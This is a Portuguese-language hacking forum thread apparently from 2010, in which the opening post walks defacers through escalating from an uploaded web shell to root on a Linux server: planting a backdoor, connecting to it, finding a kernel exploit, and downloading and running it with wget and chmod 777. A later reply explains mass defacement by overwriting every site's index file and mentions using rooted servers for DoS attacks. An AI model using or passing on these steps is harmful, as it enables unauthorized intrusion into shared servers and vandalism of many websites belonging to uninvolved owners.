Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Adquirindo Acesso ao r00t no Linux

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Adquirindo Acesso ao r00t no Linux


    +----------------------------------------------------------------------+
    | Adquirindo Acesso Total em Servidores Linux |
    +----------------------------------------------------------------------+

    [0] .-------------------: Introdução :
    Acesso ao root em servidores linux; muitos defacers conseguem explorar diversas falhas de SQL Injection
    RFI (Remote File Inclusion), Cross Site Scripting entre outras vulnerabilidades. Quando fazem o upload de uma Shell
    no sistema apenas trocam a Página Principal de um único website no Servidor. Esse tutorial mostra como entrar no sistema
    e ter acesso a todos os websites hospedados no servidor, assim o defacer conseguirá fazer um Defacer em Massa (Mass
    Defacer).

    [1] .-------------------: Primeiro passo;
    Já com o à Shell upada no Servidor faça o Upload de um [Backdoor] que pode ser encontrado facilmente nos sites:
    # Exploit-DB.com # Milw0rm.com # Inj3ct0r.com # Exploits.GuiaDoHacker.Com #

    [2] .-------------------: Segundo passo;
    Agora iremos dar permissões ao backdoor. Execute o seguinte comando (sem chaves).
    [ chmod 777 backdoor ] (sem chaves)
    No caso de chmod 777 'backdoor' representa o nome do seu backdoor, se você fez o upload dele com
    o nome de attack você deve executar o comando [ chmod 777 attack ].

    [3] .-------------------: Terceiro passo;
    Agora vamos executar o comando para mostrar a portal da shell e a versão do Kernel. Execute o seguinte comando:
    [ ./backdoor ] (sem chaves) - 'backdoor representa o nome de seu backdoor, ou seja, como citei a cima [2].

    [4] .-------------------: Quarto passo;
    Preciso descobrir o IP do Servidor.
    Abra o Prompt de Comando digitando no menu executar cmd.exe;
    Digite o comando: ping -t Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Retornará o resultados e o IP.

    [5] .-------------------: Quinto passo;
    Faça o download do programa PuTTY client SGG and telnet; instale em sua máquina.
    Abra o PuTTY e coloque o IP e a Porta mostrada no Terceiro Passo; [3].
    Se tudo correr bem, você estará conectado a Shell do Servidor.
    Procure o Exploit (XPL) da Versão Kernel adquirida no passo [3] nos sites:
    # Exploit-DB.com # Milw0rm.com # Inj3ct0r.com # Exploits.GuiaDoHacker.Com #

    [6] .-------------------: Sexto e último passo;
    Abra novamente a Shell Upada no Servidor e execute os comandos:
    [ cd/var/tmp ] (tmp é um diretório, mas pode ter outro nome o padrão é 'tmp'.
    [ wget exploit.pl ] ( 'exploit.pl' pode estar com outro nome, no meu caso esta como 'exploit.pl'.
    [ chmod 777 exploit.pl ]
    [ ./exploit ]
    ~~ Root Adquirido ~~ Agora você tem acesso total ao servidor.

    [x] .-------------------------------------------: Informações:
    # Author: #Expl0it
    # Date: 20/08/2009 (posted on the site 10/07/2010
    # E-mail: exploit@guiadohacker.com.br
    # Greetz to: h4ck3r4lp, Bruno_menor, bolinhaxp, 5ubzer0 and all members Guia do Hacker BR.
    [x] .--------------------------------------------|


    /* # Guia do Hacker - Todos direitos reservados # */
    Last edited by #Expl0it; 10-07-2010, 05:39.
    Mesmo longe, eu estou perto. Guia do Hacker 4ever.

  • Font Size
    #2
    Parabens exploit fico muito bom certeza que muita gente queria saber disso
    -------------------------------------------------------------------------------------------






    Comment


    • Font Size
      #3
      O tuto é muito bom.

      Eu já sabia. E aliás, uma pergunta que fazem muito é: o que eu faço depois do root.
      Se vc mandasse essa pro pessoal ia poupar papo no chat ^^.

      []'s

      Comment


      • Font Size
        #4
        Postado Originalmente por Google Ver Post

        uma pergunta que fazem muito é: o que eu faço depois do root.
        Mass Defacer.
        Mesmo longe, eu estou perto. Guia do Hacker 4ever.

        Comment


        • Font Size
          #5
          Postado Originalmente por #Expl0it Ver Post
          Mass Defacer.
          hauahuah isso eu sei

          Só que se você fala mass deface, ela vai perguntar: como?

          Se vc explicasse isso seria uma boa referência.

          (Não to descutindo, pros afobados de plantão).

          Comment


          • Font Size
            #6
            Postado Originalmente por Google Ver Post
            hauahuah isso eu sei

            Só que se você fala mass deface, ela vai perguntar: como?

            Se vc explicasse isso seria uma boa referência.

            (Não to descutindo, pros afobados de plantão).
            Se eu rootar eu não faria um mass...
            alias, se a shell for ruim eu faria, concerteza, mas se for boa, ai eu uso ela pra instalar jogos, rodar servidores, fazer ataque Dos ...

            bom, ai vai da cabeça de cada um, mas se a sua vontade é fazer um mass deface, vamos la...depois de rootar a maquina vc se pergunta, como fazer um mass? simples, se vc é root vc tem acesso total, o apache dos servidores ficam geralmente instalados em um so lugar, entao os sites ficam num so lugar, depende do servidor ficam em /var/www - /var/www/htdcos - /home/www

            ou os sites ficam em /home ou entao vc procure _l_

            ai é só entrar em cada dir e mudar a index, ja q temos acesso total...pronto, mass deface!
            sigpic
            Faça parte você também pela campanha da vida: Eu cuido da Minha, você cuida da sua!

            Comment


            • Font Size
              #7
              Sim, eu sei. kkk

              Só disse que faltam explicações disso em um modo geral.

              A questão de o que fazer ou como fazer não é minha, só falei que podia ter isso no post.

              Agora já acabou tudo. :cool:

              []'s

              Comment


              • Font Size
                #8
                Parabens mano gostei!!!

                Comment


                • Font Size
                  #9
                  Muito bomQ!!!!
                  vlw
                  - Think smart - Think Mac.
                  Think different - Think Linux.
                  Don't think - Windows.

                  Comment


                  • Font Size
                    #10
                    Postado Originalmente por Google Ver Post
                    Sim, eu sei. kkk

                    Só disse que faltam explicações disso em um modo geral.

                    A questão de o que fazer ou como fazer não é minha, só falei que podia ter isso no post.

                    Agora já acabou tudo. :cool:

                    []'s

                    Simples e Prático.
                    Mesmo longe, eu estou perto. Guia do Hacker 4ever.

                    Comment


                    • Font Size
                      #11
                      Ja pensou rootar uma localweb?
                      Fazer um Kilodefacer heauheaueahu
                      Boa exploit,muito boa mesmo,tenho acompanhado bastante seus posts,todos de ótima qualidade continue assim...

                      Comment


                      • Font Size
                        #12
                        [b]gosteiiii *-----------------*

                        Comment


                        • Font Size
                          #13
                          Conteúdo 'MARA'
                          Te Ajudei, Gostou do Post. Agradeça Não Custa Nada !

                          sigpic

                          Comment


                          • Font Size
                            #14
                            @Я€РЯØҳ1

                            Mano qual ferramenta eu devo upar ?

                            Comment

                            X
                            Working...
                            X